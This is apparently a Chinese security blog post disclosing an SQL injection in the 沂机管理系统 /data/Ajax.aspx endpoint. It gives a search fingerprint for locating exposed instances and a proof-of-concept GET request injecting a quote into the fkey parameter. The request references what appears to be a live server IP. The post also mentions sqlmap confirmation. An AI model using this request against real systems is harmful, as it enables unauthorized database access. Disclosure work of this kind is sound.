沂机管理系统/data/Ajax.aspx接口存在SQL注入漏洞

马船长2024-10-02 14:25

漏洞描述

沂机管理系统/data/Ajax.aspx接口存在SQL注入漏洞,攻击者可以获取服务器权限

漏洞复现

复制代码 
body="后台管理系统演示版"

POC

复制代码 
GET /data/Ajax.aspx?method=log_list&page=1&limit=20&fkey=1'&fdate1=2024-10-01+00%3A00%3A00&fdate2=2024-10-01+23%3A59%3A59 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://221.2.93.215:8091/basedata/log_list.aspx?ModuleID=104&navtabid=a102&reporttitle=60xZrkSLVc4i9GTkoGayYA==&fwidth=600&fheight=355
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ASP.NET_SessionId=d2dkwvksddxsvejtgqmh3oe3; pfbs_Login_compid=1001
Connection: keep-alive

bp 报错泄露绝对路径

sqlmap确认有漏洞

相关推荐
样子201820 分钟前
Uniapp 之renderjs解决swiper+多个video卡顿问题
前端·javascript·css·uni-app·html
Nicholas6828 分钟前
flutterAppBar之SystemUiOverlayStyle源码解析(一)
前端
黑客飓风1 小时前
JavaScript 性能优化实战大纲
前端·javascript·性能优化
emojiwoo2 小时前
【前端基础知识系列六】React 项目基本框架及常见文件夹作用总结(图文版)
前端·react.js·前端框架
yatingliu20193 小时前
HiveQL | 个人学习笔记
hive·笔记·sql·学习
张人玉3 小时前
XML 序列化与操作详解笔记
xml·前端·笔记
杨荧3 小时前
基于Python的宠物服务管理系统 Python+Django+Vue.js
大数据·前端·vue.js·爬虫·python·信息可视化
YeeWang3 小时前
🎉 Eficy 让你的 Cherry Studio 直接生成可预览的 React 页面
前端·javascript
gnip3 小时前
Jenkins部署前端项目实战方案
前端·javascript·架构
Orange3015114 小时前
《深入源码理解webpack构建流程》
前端·javascript·webpack·typescript·node.js·es6
热门推荐
01UV安装并设置国内源02DeepSeek更新!速览DeepSeek V3.1新特性03Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code04KGG转MP3工具|非KGM文件|解密音频05蜘蛛磁力 搜索引擎大全,如何使用蜘蛛磁力查找磁力链接06【2025.08.06最新版】Android Studio下载、安装及配置记录(自动下载sdk)072025最新国内服务器可用docker源仓库地址大全(2025年8月更新)08阿里开源首个图像生成基础模型——Qwen-Image本地部署教程,超强中文渲染能力刷新SOTA!09NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南10TRAE 规则(Rules)配置指南:个人习惯、团队规范与最佳实践